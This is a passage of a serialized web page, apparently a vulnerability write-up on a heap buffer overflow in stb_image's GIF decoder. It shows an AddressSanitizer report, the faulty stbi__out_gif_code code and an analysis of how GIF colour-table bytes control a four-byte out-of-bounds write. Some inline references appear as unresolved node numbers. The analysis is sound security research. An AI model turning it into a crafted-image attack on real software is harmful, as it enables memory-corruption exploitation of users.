fuzzing input, ASAN reports another violation in the same function at a different line:",{"type":24,"tag":291,"props":1151,"children":1153},{"code":1152},"=================================================================\n==8578==ERROR: AddressSanitizer: heap-buffer-overflow on address ...\nWRITE of size 1 at 0x7f0fe6e6c800 thread T0\n #0 0x5d54e32a4315 in stbi__out_gif_code stb/stb_image.h:6237\n [...]\n",[1154],{"type":24,"tag":145,"props":1155,"children":1156},{"__ignoreMap":7},[1157],{"type":30,"value":1152},{"type":24,"tag":32,"props":1159,"children":1160},{},[1161],{"type":30,"value":1162},"This corresponds to:",{"type":24,"tag":291,"props":1164,"children":1166},{"code":1165,"language":294,"meta":7,"className":295,"style":7},"static void stbi__out_gif_code(stbi__gif *g, stbi__uint16 code)\n{\n [...]\n\n idx = g->cur_x + g->cur_y; \n p = &g->out[idx];\n g->history[idx / 4] = 1; \n\n c = &g->color_table[g->codes[code].suffix * 4];\n if (c[3] > 128) {\n p[0] = c[2]; // OOB write\n p[1] = c[1];\n p[2] = c[0];\n p[3] = c[3];\n }\n",[1167],{"type":24,"tag":145,"props":1168,"children":1169},{"__ignoreMap":7},[1170,1209,1216,1223,1230,1273,1304,1348,1355,1424,1466,1514,1553,1592,1631],{"type":24,"tag":301,"props":1171,"children":1172},{"class":303,"line":304},[1173,1177,1181,1185,1189,1193,1197,1201,1205],{"type":24,"tag":301,"props":1174,"children":1175},{"style":348},[1176],{"type":30,"value":752},{"type":24,"tag":301,"props":1178,"children":1179},{"style":348},[1180],{"type":30,"value":757},{"type":24,"tag":301,"props":1182,"children":1183},{"style":314},[1184],{"type":30,"value":762},{"type":24,"tag":301,"props":1186,"children":1187},{"style":359},[1188],{"type":30,"value":767},{"type":24,"tag":301,"props":1190,"children":1191},{"style":385},[1192],{"type":30,"value":772},{"type":24,"tag":301,"props":1194,"children":1195},{"style":369},[1196],{"type":30,"value":777},{"type":24,"tag":301,"props":1198,"children":1199},{"style":359},[1200],{"type":30,"value":782},{"type":24,"tag":301,"props":1202,"children":1203},{"style":369},[1204],{"type":30,"value":145},{"type":24,"tag":301,"props":1206,"children":1207},{"style":359},[1208],{"type":30,"value":791},{"type":24,"tag":301,"props":1210,"children":1211},{"class":303,"line":320},[1212],{"type":24,"tag":301,"props":1213,"children":1214},{"style":359},[1215],{"type":30,"value":799},{"type":24,"tag":301,"props":1217,"children":1218},{"class":303,"line":335},[1219],{"type":24,"tag":301,"props":1220,"children":1221},{"style":359},[1222],{"type":30,"value":853},{"type":24,"tag":301,"props":1224,"children":1225},{"class":303,"line":344},[1226],{"type":24,"tag":301,"props":1227,"children":1228},{"emptyLinePlaceholder":16},[1229],{"type":30,"value":341},{"type":24,"tag":301,"props":1231,"children":1232},{"class":303,"line":401},[1233,1237,1241,1245,1249,1253,1257,1261,1265,1269],{"type":24,"tag":301,"props":1234,"children":1235},{"style":359},[1236],{"type":30,"value":935},{"type":24,"tag":301,"props":1238,"children":1239},{"style":385},[1240],{"type":30,"value":523},{"type":24,"tag":301,"props":1242,"children":1243},{"style":369},[1244],{"type":30,"value":897},{"type":24,"tag":301,"props":1246,"children":1247},{"style":359},[1248],{"type":30,"value":882},{"type":24,"tag":301,"props":1250,"children":1251},{"style":369},[1252],{"type":30,"value":952},{"type":24,"tag":301,"props":1254,"children":1255},{"style":385},[1256],{"type":30,"value":957},{"type":24,"tag":301,"props":1258,"children":1259},{"style":369},[1260],{"type":30,"value":897},{"type":24,"tag":301,"props":1262,"children":1263},{"style":359},[1264],{"type":30,"value":882},{"type":24,"tag":301,"props":1266,"children":1267},{"style":369},[1268],{"type":30,"value":887},{"type":24,"tag":301,"props":1270,"children":1271},{"style":359},[1272],{"type":30,"value":974},{"type":24,"tag":301,"props":1274,"children":1275},{"class":303,"line":415},[1276,1280,1284,1288,1292,1296,1300],{"type":24,"tag":301,"props":1277,"children":1278},{"style":359},[1279],{"type":30,"value":982},{"type":24,"tag":301,"props":1281,"children":1282},{"style":385},[1283],{"type":30,"value":523},{"type":24,"tag":301,"props":1285,"children":1286},{"style":385},[1287],{"type":30,"value":991},{"type":24,"tag":301,"props":1289,"children":1290},{"style":369},[1291],{"type":30,"value":777},{"type":24,"tag":301,"props":1293,"children":1294},{"style":359},[1295],{"type":30,"value":882},{"type":24,"tag":301,"props":1297,"children":1298},{"style":369},[1299],{"type":30,"value":1004},{"type":24,"tag":301,"props":1301,"children":1302},{"style":359},[1303],{"type":30,"value":1009},{"type":24,"tag":301,"props":1305,"children":1306},{"class":303,"line":439},[1307,1311,1315,1319,1323,1327,1331,1335,1339,1343],{"type":24,"tag":301,"props":1308,"children":1309},{"style":369},[1310],{"type":30,"value":1017},{"type":24,"tag":301,"props":1312,"children":1313},{"style":359},[1314],{"type":30,"value":882},{"type":24,"tag":301,"props":1316,"children":1317},{"style":369},[1318],{"type":30,"value":1026},{"type":24,"tag":301,"props":1320,"children":1321},{"style":359},[1322],{"type":30,"value":1031},{"type":24,"tag":301,"props":1324,"children":1325},{"style":385},[1326],{"type":30,"value":1036},{"type":24,"tag":301,"props":1328,"children":1329},{"style":466},[1330],{"type":30,"value":1041},{"type":24,"tag":301,"props":1332,"children":1333},{"style":359},[1334],{"type":30,"value":1046},{"type":24,"tag":301,"props":1336,"children":1337},{"style":385},[1338],{"type":30,"value":523},{"type":24,"tag":301,"props":1340,"children":1341},{"style":466},[1342],{"type":30,"value":487},{"type":24,"tag":301,"props":1344,"children":1345},{"style":359},[1346],{"type":30,"value":1347},"; \n",{"type":24,"tag":301,"props":1349,"children":1350},{"class":303,"line":447},[1351],{"type":24,"tag":301,"props":1352,"children":1353},{"emptyLinePlaceholder":16},[1354],{"type":30,"value":341},{"type":24,"tag":301,"props":1356,"children":1357},{"class":303,"line":476},[1358,1363,1367,1371,1375,1379,1384,1388,1392,1396,1401,1406,1411,1415,1419],{"type":24,"tag":301,"props":1359,"children":1360},{"style":359},[1361],{"type":30,"value":1362}," c ",{"type":24,"tag":301,"props":1364,"children":1365},{"style":385},[1366],{"type":30,"value":523},{"type":24,"tag":301,"props":1368,"children":1369},{"style":385},[1370],{"type":30,"value":991},{"type":24,"tag":301,"props":1372,"children":1373},{"style":369},[1374],{"type":30,"value":777},{"type":24,"tag":301,"props":1376,"children":1377},{"style":359},[1378],{"type":30,"value":882},{"type":24,"tag":301,"props":1380,"children":1381},{"style":369},[1382],{"type":30,"value":1383},"color_table",{"type":24,"tag":301,"props":1385,"children":1386},{"style":359},[1387],{"type":30,"value":541},{"type":24,"tag":301,"props":1389,"children":1390},{"style":369},[1391],{"type":30,"value":777},{"type":24,"tag":301,"props":1393,"children":1394},{"style":359},[1395],{"type":30,"value":882},{"type":24,"tag":301,"props":1397,"children":1398},{"style":369},[1399],{"type":30,"value":1400},"codes",{"type":24,"tag":301,"props":1402,"children":1403},{"style":359},[1404],{"type":30,"value":1405},"[code].",{"type":24,"tag":301,"props":1407,"children":1408},{"style":369},[1409],{"type":30,"value":1410},"suffix",{"type":24,"tag":301,"props":1412,"children":1413},{"style":385},[1414],{"type":30,"value":431},{"type":24,"tag":301,"props":1416,"children":1417},{"style":466},[1418],{"type":30,"value":1041},{"type":24,"tag":301,"props":1420,"children":1421},{"style":359},[1422],{"type":30,"value":1423},"];\n",{"type":24,"tag":301,"props":1425,"children":1426},{"class":303,"line":495},[1427,1431,1435,1439,1443,1448,1452,1457,1462],{"type":24,"tag":301,"props":1428,"children":1429},{"style":308},[1430],{"type":30,"value":868},{"type":24,"tag":301,"props":1432,"children":1433},{"style":359},[1434],{"type":30,"value":873},{"type":24,"tag":301,"props":1436,"children":1437},{"style":369},[1438],{"type":30,"value":294},{"type":24,"tag":301,"props":1440,"children":1441},{"style":359},[1442],{"type":30,"value":541},{"type":24,"tag":301,"props":1444,"children":1445},{"style":466},[1446],{"type":30,"value":1447},"3",{"type":24,"tag":301,"props":1449,"children":1450},{"style":359},[1451],{"type":30,"value":1046},{"type":24,"tag":301,"props":1453,"children":1454},{"style":385},[1455],{"type":30,"value":1456},">",{"type":24,"tag":301,"props":1458,"children":1459},{"style":466},[1460],{"type":30,"value":1461}," 128",{"type":24,"tag":301,"props":1463,"children":1464},{"style":359},[1465],{"type":30,"value":398},{"type":24,"tag":301,"props":1467,"children":1468},{"class":303,"line":504},[1469,1474,1478,1482,1486,1490,1495,1499,1504,1509],{"type":24,"tag":301,"props":1470,"children":1471},{"style":369},[1472],{"type":30,"value":1473}," p",{"type":24,"tag":301,"props":1475,"children":1476},{"style":359},[1477],{"type":30,"value":541},{"type":24,"tag":301,"props":1479,"children":1480},{"style":466},[1481],{"type":30,"value":584},{"type":24,"tag":301,"props":1483,"children":1484},{"style":359},[1485],{"type":30,"value":1046},{"type":24,"tag":301,"props":1487,"children":1488},{"style":385},[1489],{"type":30,"value":523},{"type":24,"tag":301,"props":1491,"children":1492},{"style":369},[1493],{"type":30,"value":1494}," c",{"type":24,"tag":301,"props":1496,"children":1497},{"style":359},[1498],{"type":30,"value":541},{"type":24,"tag":301,"props":1500,"children":1501},{"style":466},[1502],{"type":30,"value":1503},"2",{"type":24,"tag":301,"props":1505,"children":1506},{"style":359},[1507],{"type":30,"value":1508},"];",{"type":24,"tag":301,"props":1510,"children":1511},{"style":1062},[1512],{"type":30,"value":1513}," // OOB write\n",{"type":24,"tag":301,"props":1515,"children":1516},{"class":303,"line":512},[1517,1521,1525,1529,1533,1537,1541,1545,1549],{"type":24,"tag":301,"props":1518,"children":1519},{"style":369},[1520],{"type":30,"value":1473},{"type":24,"tag":301,"props":1522,"children":1523},{"style":359},[1524],{"type":30,"value":541},{"type":24,"tag":301,"props":1526,"children":1527},{"style":466},[1528],{"type":30,"value":546},{"type":24,"tag":301,"props":1530,"children":1531},{"style":359},[1532],{"type":30,"value":1046},{"type":24,"tag":301,"props":1534,"children":1535},{"style":385},[1536],{"type":30,"value":523},{"type":24,"tag":301,"props":1538,"children":1539},{"style":369},[1540],{"type":30,"value":1494},{"type":24,"tag":301,"props":1542,"children":1543},{"style":359},[1544],{"type":30,"value":541},{"type":24,"tag":301,"props":1546,"children":1547},{"style":466},[1548],{"type":30,"value":546},{"type":24,"tag":301,"props":1550,"children":1551},{"style":359},[1552],{"type":30,"value":1423},{"type":24,"tag":301,"props":1554,"children":1555},{"class":303,"line":592},[1556,1560,1564,1568,1572,1576,1580,1584,1588],{"type":24,"tag":301,"props":1557,"children":1558},{"style":369},[1559],{"type":30,"value":1473},{"type":24,"tag":301,"props":1561,"children":1562},{"style":359},[1563],{"type":30,"value":541},{"type":24,"tag":301,"props":1565,"children":1566},{"style":466},[1567],{"type":30,"value":1503},{"type":24,"tag":301,"props":1569,"children":1570},{"style":359},[1571],{"type":30,"value":1046},{"type":24,"tag":301,"props":1573,"children":1574},{"style":385},[1575],{"type":30,"value":523},{"type":24,"tag":301,"props":1577,"children":1578},{"style":369},[1579],{"type":30,"value":1494},{"type":24,"tag":301,"props":1581,"children":1582},{"style":359},[1583],{"type":30,"value":541},{"type":24,"tag":301,"props":1585,"children":1586},{"style":466},[1587],{"type":30,"value":584},{"type":24,"tag":301,"props":1589,"children":1590},{"style":359},[1591],{"type":30,"value":1423},{"type":24,"tag":301,"props":1593,"children":1594},{"class":303,"line":619},[1595,1599,1603,1607,1611,1615,1619,1623,1627],{"type":24,"tag":301,"props":1596,"children":1597},{"style":369},[1598],{"type":30,"value":1473},{"type":24,"tag":301,"props":1600,"children":1601},{"style":359},[1602],{"type":30,"value":541},{"type":24,"tag":301,"props":1604,"children":1605},{"style":466},[1606],{"type":30,"value":1447},{"type":24,"tag":301,"props":1608,"children":1609},{"style":359},[1610],{"type":30,"value":1046},{"type":24,"tag":301,"props":1612,"children":1613},{"style":385},[1614],{"type":30,"value":523},{"type":24,"tag":301,"props":1616,"children":1617},{"style":369},[1618],{"type":30,"value":1494},{"type":24,"tag":301,"props":1620,"children":1621},{"style":359},[1622],{"type":30,"value":541},{"type":24,"tag":301,"props":1624,"children":1625},{"style":466},[1626],{"type":30,"value":1447},{"type":24,"tag":301,"props":1628,"children":1629},{"style":359},[1630],{"type":30,"value":1423},{"type":24,"tag":301,"props":1632,"children":1633},{"class":303,"line":635},[1634],{"type":24,"tag":301,"props":1635,"children":1636},{"style":359},[1637],{"type":30,"value":1638}," }\n",{"type":24,"tag":32,"props":1640,"children":1641},{},[1642,1644,1649,1651,1656],{"type":30,"value":1643},"This confirms ",{"type":24,"tag":145,"props":1645,"children":1647},{"className":1646},[],[1648],{"type":30,"value":1076},{"type":30,"value":1650}," is OOB for ",{"type":24,"tag":145,"props":1652,"children":1654},{"className":1653},[],[1655],{"type":30,"value":1127},{"type":30,"value":1657}," as well - here it results in a four-byte OOB write. A four-byte OOB write is still not trivial to exploit remotely, but it is meaningfully more dangerous than a single-byte OOB.",{"type":24,"tag":32,"props":1659,"children":1660},{},[1661,1663,1669,1671,1678],{"type":30,"value":1662},"We've read through the GIF parsing code to find out if the written values can be controlled, and found that ",{"type":24,"tag":145,"props":1664,"children":1666},{"className":1665},[],[1667],{"type":30,"value":1668},"g->color_table",{"type":30,"value":1670}," is populated by ",{"type":24,"tag":188,"props":1672,"children":1675},{"href":1673,"rel":1674},"https://github.com/nothings/stb/blob/f1f077b2722f55e158cba020f0312ee2d13c463a/stb_image.h#L6166-L6175",[192],[1676],{"type":30,"value":1677},"stbi__gif_parse_colortable",{"type":30,"value":1679},":",{"type":24,"tag":291,"props":1681,"children":1683},{"code":1682,"language":294,"meta":7,"className":295,"style":7},"static void stbi__gif_parse_colortable(\n stbi__context *s,\n stbi_uc pal[256][4], // g->color_table\n int num_entries,\n int transp\n) {\n int i;\n for (i=0; i \u003C num_entries; ++i) {\n pal[i][2] = stbi__get8(s);\n pal[i][1] = stbi__get8(s);\n pal[i][0] = stbi__get8(s);\n pal[i][3] = transp == i ? 0 : 255;\n }\n}\n",[1684],{"type":24,"tag":145,"props":1685,"children":1686},{"__ignoreMap":7},[1687,1708,1730,1772,1788,1800,1807,1819,1865,1900,1931,1962,2022,2029],{"type":24,"tag":301,"props":1688,"children":1689},{"class":303,"line":304},[1690,1694,1698,1703],{"type":24,"tag":301,"props":1691,"children":1692},{"style":348},[1693],{"type":30,"value":752},{"type":24,"tag":301,"props":1695,"children":1696},{"style":348},[1697],{"type":30,"value":757},{"type":24,"tag":301,"props":1699,"children":1700},{"style":314},[1701],{"type":30,"value":1702}," stbi__gif_parse_colortable",{"type":24,"tag":301,"props":1704,"children":1705},{"style":359},[1706],{"type":30,"value":1707},"(\n",{"type":24,"tag":301,"props":1709,"children":1710},{"class":303,"line":320},[1711,1716,1720,1725],{"type":24,"tag":301,"props":1712,"children":1713},{"style":359},[1714],{"type":30,"value":1715}," stbi__context ",{"type":24,"tag":301,"props":1717,"children":1718},{"style":385},[1719],{"type":30,"value":772},{"type":24,"tag":301,"props":1721,"children":1722},{"style":369},[1723],{"type":30,"value":1724},"s",{"type":24,"tag":301,"props":1726,"children":1727},{"style":359},[1728],{"type":30,"value":1729},",\n",{"type":24,"tag":301,"props":1731,"children":1732},{"class":303,"line":335},[1733,1738,1743,1747,1752,1757,1762,1767],{"type":24,"tag":301,"props":1734,"children":1735},{"style":359},[1736],{"type":30,"value":1737}," stbi_uc ",{"type":24,"tag":301,"props":1739,"children":1740},{"style":369},[1741],{"type":30,"value":1742},"pal",{"type":24,"tag":301,"props":1744,"children":1745},{"style":359},[1746],{"type":30,"value":541},{"type":24,"tag":301,"props":1748,"children":1749},{"style":466},[1750],{"type":30,"value":1751},"256",{"type":24,"tag":301,"props":1753,"children":1754},{"style":359},[1755],{"type":30,"value":1756},"][",{"type":24,"tag":301,"props":1758,"children":1759},{"style":466},[1760],{"type":30,"value":1761},"4",{"type":24,"tag":301,"props":1763,"children":1764},{"style":359},[1765],{"type":30,"value":1766},"],",{"type":24,"tag":301,"props":1768,"children":1769},{"style":1062},[1770],{"type":30,"value":1771}," // g->color_table\n",{"type":24,"tag":301,"props":1773,"children":1774},{"class":303,"line":344},[1775,1779,1784],{"type":24,"tag":301,"props":1776,"children":1777},{"style":348},[1778],{"type":30,"value":407},{"type":24,"tag":301,"props":1780,"children":1781},{"style":369},[1782],{"type":30,"value":1783}," num_entries",{"type":24,"tag":301,"props":1785,"children":1786},{"style":359},[1787],{"type":30,"value":1729},{"type":24,"tag":301,"props":1789,"children":1790},{"class":303,"line":401},[1791,1795],{"type":24,"tag":301,"props":1792,"children":1793},{"style":348},[1794],{"type":30,"value":407},{"type":24,"tag":301,"props":1796,"children":1797},{"style":359},[1798],{"type":30,"value":1799}," transp\n",{"type":24,"tag":301,"props":1801,"children":1802},{"class":303,"line":415},[1803],{"type":24,"tag":301,"props":1804,"children":1805},{"style":359},[1806],{"type":30,"value":398},{"type":24,"tag":301,"props":1808,"children":1809},{"class":303,"line":439},[1810,1814],{"type":24,"tag":301,"props":1811,"children":1812},{"style":348},[1813],{"type":30,"value":833},{"type":24,"tag":301,"props":1815,"children":1816},{"style":359},[1817],{"type":30,"value":1818}," i;\n",{"type":24,"tag":301,"props":1820,"children":1821},{"class":303,"line":447},[1822,1827,1832,1836,1840,1845,1850,1855,1860],{"type":24,"tag":301,"props":1823,"children":1824},{"style":308},[1825],{"type":30,"value":1826}," for",{"type":24,"tag":301,"props":1828,"children":1829},{"style":359},[1830],{"type":30,"value":1831}," (i",{"type":24,"tag":301,"props":1833,"children":1834},{"style":385},[1835],{"type":30,"value":523},{"type":24,"tag":301,"props":1837,"children":1838},{"style":466},[1839],{"type":30,"value":584},{"type":24,"tag":301,"props":1841,"children":1842},{"style":359},[1843],{"type":30,"value":1844},"; i ",{"type":24,"tag":301,"props":1846,"children":1847},{"style":385},[1848],{"type":30,"value":1849},"\u003C",{"type":24,"tag":301,"props":1851,"children":1852},{"style":359},[1853],{"type":30,"value":1854}," num_entries; ",{"type":24,"tag":301,"props":1856,"children":1857},{"style":385},[1858],{"type":30,"value":1859},"++",{"type":24,"tag":301,"props":1861,"children":1862},{"style":359},[1863],{"type":30,"value":1864},"i) {\n",{"type":24,"tag":301,"props":1866,"children":1867},{"class":303,"line":476},[1868,1873,1878,1882,1886,1890,1895],{"type":24,"tag":301,"props":1869,"children":1870},{"style":369},[1871],{"type":30,"value":1872}," pal",{"type":24,"tag":301,"props":1874,"children":1875},{"style":359},[1876],{"type":30,"value":1877},"[i][",{"type":24,"tag":301,"props":1879,"children":1880},{"style":466},[1881],{"type":30,"value":1503},{"type":24,"tag":301,"props":1883,"children":1884},{"style":359},[1885],{"type":30,"value":1046},{"type":24,"tag":301,"props":1887,"children":1888},{"style":385},[1889],{"type":30,"value":523},{"type":24,"tag":301,"props":1891,"children":1892},{"style":314},[1893],{"type":30,"value":1894}," stbi__get8",{"type":24,"tag":301,"props":1896,"children":1897},{"style":359},[1898],{"type":30,"value":1899},"(s);\n",{"type":24,"tag":301,"props":1901,"children":1902},{"class":303,"line":495},[1903,1907,1911,1915,1919,1923,1927],{"type":24,"tag":301,"props":1904,"children":1905},{"style":369},[1906],{"type":30,"value":1872},{"type":24,"tag":301,"props":1908,"children":1909},{"style":359},[1910],{"type":30,"value":1877},{"type":24,"tag":301,"props":1912,"children":1913},{"style":466},[1914],{"type":30,"value":546},{"type":24,"tag":301,"props":1916,"children":1917},{"style":359},[1918],{"type":30,"value":1046},{"type":24,"tag":301,"props":1920,"children":1921},{"style":385},[1922],{"type":30,"value":523},{"type":24,"tag":301,"props":1924,"children":1925},{"style":314},[1926],{"type":30,"value":1894},{"type":24,"tag":301,"props":1928,"children":1929},{"style":359},[1930],{"type":30,"value":1899},{"type":24,"tag":301,"props":1932,"children":1933},{"class":303,"line":504},[1934,1938,1942,1946,1950,1954,1958],{"type":24,"tag":301,"props":1935,"children":1936},{"style":369},[1937],{"type":30,"value":1872},{"type":24,"tag":301,"props":1939,"children":1940},{"style":359},[1941],{"type":30,"value":1877},{"type":24,"tag":301,"props":1943,"children":1944},{"style":466},[1945],{"type":30,"value":584},{"type":24,"tag":301,"props":1947,"children":1948},{"style":359},[1949],{"type":30,"value":1046},{"type":24,"tag":301,"props":1951,"children":1952},{"style":385},[1953],{"type":30,"value":523},{"type":24,"tag":301,"props":1955,"children":1956},{"style":314},[1957],{"type":30,"value":1894},{"type":24,"tag":301,"props":1959,"children":1960},{"style":359},[1961],{"type":30,"value":1899},{"type":24,"tag":301,"props":1963,"children":1964},{"class":303,"line":512},[1965,1969,1973,1977,1981,1985,1990,1994,1999,2004,2008,2013,2018],{"type":24,"tag":301,"props":1966,"children":1967},{"style":369},[1968],{"type":30,"value":1872},{"type":24,"tag":301,"props":1970,"children":1971},{"style":359},[1972],{"type":30,"value":1877},{"type":24,"tag":301,"props":1974,"children":1975},{"style":466},[1976],{"type":30,"value":1447},{"type":24,"tag":301,"props":1978,"children":1979},{"style":359},[1980],{"type":30,"value":1046},{"type":24,"tag":301,"props":1982,"children":1983},{"style":385},[1984],{"type":30,"value":523},{"type":24,"tag":301,"props":1986,"children":1987},{"style":359},[1988],{"type":30,"value":1989}," transp ",{"type":24,"tag":301,"props":1991,"children":1992},{"style":385},[1993],{"type":30,"value":607},{"type":24,"tag":301,"props":1995,"children":1996},{"style":359},[1997],{"type":30,"value":1998}," i ",{"type":24,"tag":301,"props":2000,"children":2001},{"style":385},[2002],{"type":30,"value":2003},"?",{"type":24,"tag":301,"props":2005,"children":2006},{"style":466},[2007],{"type":30,"value":685},{"type":24,"tag":301,"props":2009,"children":2010},{"style":385},[2011],{"type":30,"value":2012}," :",{"type":24,"tag":301,"props":2014,"children":2015},{"style":466},[2016],{"type":30,"value":2017}," 255",{"type":24,"tag":301,"props":2019,"children":2020},{"style":359},[2021],{"type":30,"value":492},{"type":24,"tag":301,"props":2023,"children":2024},{"class":303,"line":592},[2025],{"type":24,"tag":301,"props":2026,"children":2027},{"style":359},[2028],{"type":30,"value":1638},{"type":24,"tag":301,"props":2030,"children":2031},{"class":303,"line":619},[2032],{"type":24,"tag":301,"props":2033,"children":2034},{"style":359},[2035],{"type":30,"value":698},{"type":24,"tag":32,"props":2037,"children":2038},{},[2039,2041,2046,2047,2053,2055,2061],{"type":30,"value":2040},"The first three bytes are read from the input image, while the last byte can be either ",{"type":24,"tag":145,"props":2042,"children":2044},{"className":2043},[],[2045],{"type":30,"value":584},{"type":30,"value":152},{"type":24,"tag":145,"props":2048,"children":2050},{"className":2049},[],[2051],{"type":30,"value":2052},"255",{"type":30,"value":2054},". But as we've seen previously, the OOB write only happens if the last byte is more than ",{"type":24,"tag":145,"props":2056,"children":2058},{"className":2057},[],[2059],{"type":30,"value":2060},"128",{"type":30,"value":1679},{"type":24,"tag":291,"props":2063,"children":2065},{"code":2064,"language":294,"meta":7,"className":295,"style":7}," c = &g->color_table[g->codes[code].suffix * 4];\n if (c[3] > 128) {\n p[0] = c[2];\n p[1] = c[1];\n p[2] = c[0];\n p[3] = c[3];\n }\n",[2066],{"type":24,"tag":145,"props":2067,"children":2068},{"__ignoreMap":7},[2069,2132,2171,2210,2249,2288,2327],{"type":24,"tag":301,"props":2070,"children":2071},{"class":303,"line":304},[2072,2076,2080,2084,2088,2092,2096,2100,2104,2108,2112,2116,2120,2124,2128],{"type":24,"tag":301,"props":2073,"children":2074},{"style":359},[2075],{"type":30,"value":1362},{"type":24,"tag":301,"props":2077,"children":2078},{"style":385},[2079],{"type":30,"value":523},{"type":24,"tag":301,"props":2081,"children":2082},{"style":385},[2083],{"type":30,"value":991},{"type":24,"tag":301,"props":2085,"children":2086},{"style":359},[2087],{"type":30,"value":777},{"type":24,"tag":301,"props":2089,"children":2090},{"style":385},[2091],{"type":30,"value":882},{"type":24,"tag":301,"props":2093,"children":2094},{"style":369},[2095],{"type":30,"value":1383},{"type":24,"tag":301,"props":2097,"children":2098},{"style":359},[2099],{"type":30,"value":541},{"type":24,"tag":301,"props":2101,"children":2102},{"style":369},[2103],{"type":30,"value":777},{"type":24,"tag":301,"props":2105,"children":2106},{"style":359},[2107],{"type":30,"value":882},{"type":24,"tag":301,"props":2109,"children":2110},{"style":369},[2111],{"type":30,"value":1400},{"type":24,"tag":301,"props":2113,"children":2114},{"style":359},[2115],{"type":30,"value":1405},{"type":24,"tag":301,"props":2117,"children":2118},{"style":369},[2119],{"type":30,"value":1410},{"type":24,"tag":301,"props":2121,"children":2122},{"style":385},[2123],{"type":30,"value":431},{"type":24,"tag":301,"props":2125,"children":2126},{"style":466},[2127],{"type":30,"value":1041},{"type":24,"tag":301,"props":2129,"children":2130},{"style":359},[2131],{"type":30,"value":1423},{"type":24,"tag":301,"props":2133,"children":2134},{"class":303,"line":320},[2135,2139,2143,2147,2151,2155,2159,2163,2167],{"type":24,"tag":301,"props":2136,"children":2137},{"style":308},[2138],{"type":30,"value":868},{"type":24,"tag":301,"props":2140,"children":2141},{"style":359},[2142],{"type":30,"value":873},{"type":24,"tag":301,"props":2144,"children":2145},{"style":369},[2146],{"type":30,"value":294},{"type":24,"tag":301,"props":2148,"children":2149},{"style":359},[2150],{"type":30,"value":541},{"type":24,"tag":301,"props":2152,"children":2153},{"style":466},[2154],{"type":30,"value":1447},{"type":24,"tag":301,"props":2156,"children":2157},{"style":359},[2158],{"type":30,"value":1046},{"type":24,"tag":301,"props":2160,"children":2161},{"style":385},[2162],{"type":30,"value":1456},{"type":24,"tag":301,"props":2164,"children":2165},{"style":466},[2166],{"type":30,"value":1461},{"type":24,"tag":301,"props":2168,"children":2169},{"style":359},[2170],{"type":30,"value":398},{"type":24,"tag":301,"props":2172,"children":2173},{"class":303,"line":335},[2174,2178,2182,2186,2190,2194,2198,2202,2206],{"type":24,"tag":301,"props":2175,"children":2176},{"style":369},[2177],{"type":30,"value":1473},{"type":24,"tag":301,"props":2179,"children":2180},{"style":359},[2181],{"type":30,"value":541},{"type":24,"tag":301,"props":2183,"children":2184},{"style":466},[2185],{"type":30,"value":584},{"type":24,"tag":301,"props":2187,"children":2188},{"style":359},[2189],{"type":30,"value":1046},{"type":24,"tag":301,"props":2191,"children":2192},{"style":385},[2193],{"type":30,"value":523},{"type":24,"tag":301,"props":2195,"children":2196},{"style":369},[2197],{"type":30,"value":1494},{"type":24,"tag":301,"props":2199,"children":2200},{"style":359},[2201],{"type":30,"value":541},{"type":24,"tag":301,"props":2203,"children":2204},{"style":466},[2205],{"type":30,"value":1503},{"type":24,"tag":301,"props":2207,"children":2208},{"style":359},[2209],{"type":30,"value":1423},{"type":24,"tag":301,"props":2211,"children":2212},{"class":303,"line":344},[2213,2217,2221,2225,2229,2233,2237,2241,2245],{"type":24,"tag":301,"props":2214,"children":2215},{"style":369},[2216],{"type":30,"value":1473},{"type":24,"tag":301,"props":2218,"children":2219},{"style":359},[2220],{"type":30,"value":541},{"type":24,"tag":301,"props":2222,"children":2223},{"style":466},[2224],{"type":30,"value":546},{"type":24,"tag":301,"props":2226,"children":2227},{"style":359},[2228],{"type":30,"value":1046},{"type":24,"tag":301,"props":2230,"children":2231},{"style":385},[2232],{"type":30,"value":523},{"type":24,"tag":301,"props":2234,"children":2235},{"style":369},[2236],{"type":30,"value":1494},{"type":24,"tag":301,"props":2238,"children":2239},{"style":359},[2240],{"type":30,"value":541},{"type":24,"tag":301,"props":2242,"children":2243},{"style":466},[2244],{"type":30,"value":546},{"type":24,"tag":301,"props":2246,"children":2247},{"style":359},[2248],{"type":30,"value":1423},{"type":24,"tag":301,"props":2250,"children":2251},{"class":303,"line":401},[2252,2256,2260,2264,2268,2272,2276,2280,2284],{"type":24,"tag":301,"props":2253,"children":2254},{"style":369},[2255],{"type":30,"value":1473},{"type":24,"tag":301,"props":2257,"children":2258},{"style":359},[2259],{"type":30,"value":541},{"type":24,"tag":301,"props":2261,"children":2262},{"style":466},[2263],{"type":30,"value":1503},{"type":24,"tag":301,"props":2265,"children":2266},{"style":359},[2267],{"type":30,"value":1046},{"type":24,"tag":301,"props":2269,"children":2270},{"style":385},[2271],{"type":30,"value":523},{"type":24,"tag":301,"props":2273,"children":2274},{"style":369},[2275],{"type":30,"value":1494},{"type":24,"tag":301,"props":2277,"children":2278},{"style":359},[2279],{"type":30,"value":541},{"type":24,"tag":301,"props":2281,"children":2282},{"style":466},[2283],{"type":30,"value":584},{"type":24,"tag":301,"props":2285,"children":2286},{"style":359},[2287],{"type":30,"value":1423},{"type":24,"tag":301,"props":2289,"children":2290},{"class":303,"line":415},[2291,2295,2299,2303,2307,2311,2315,2319,2323],{"type":24,"tag":301,"props":2292,"children":2293},{"style":369},[2294],{"type":30,"value":1473},{"type":24,"tag":301,"props":2296,"children":2297},{"style":359},[2298],{"type":30,"value":541},{"type":24,"tag":301,"props":2300,"children":2301},{"style":466},[2302],{"type":30,"value":1447},{"type":24,"tag":301,"props":2304,"children":2305},{"style":359},[2306],{"type":30,"value":1046},{"type":24,"tag":301,"props":2308,"children":2309},{"style":385},[2310],{"type":30,"value":523},{"type":24,"tag":301,"props":2312,"children":2313},{"style":369},[2314],{"type":30,"value":1494},{"type":24,"tag":301,"props":2316,"children":2317},{"style":359},[2318],{"type":30,"value":541},{"type":24,"tag":301,"props":2320,"children":2321},{"style":466},[2322],{"type":30,"value":1447},{"type":24,"tag":301,"props":2324,"children":2325},{"style":359},[2326],{"type":30,"value":1423},{"type":24,"tag":301,"props":2328,"children":2329},{"class":303,"line":439},[2330],{"type":24,"tag":301,"props":2331,"children":2332},{"style":359},[2333],{"type":30,"value":1638},{"type":24,"tag":32,"props":2335,"children":2336},{},[2337,2339,2344,2346,2351,2353,2358],{"type":30,"value":2338},"This means that ",{"type":24,"tag":145,"props":2340,"children":2342},{"className":2341},[],[2343],{"type":30,"value":1677},{"type":30,"value":2345}," has to set the last byte to ",{"type":24,"tag":145,"props":2347,"children":2349},{"className":2348},[],[2350],{"type":30,"value":2052},{"type":30,"value":2352}," in order for the 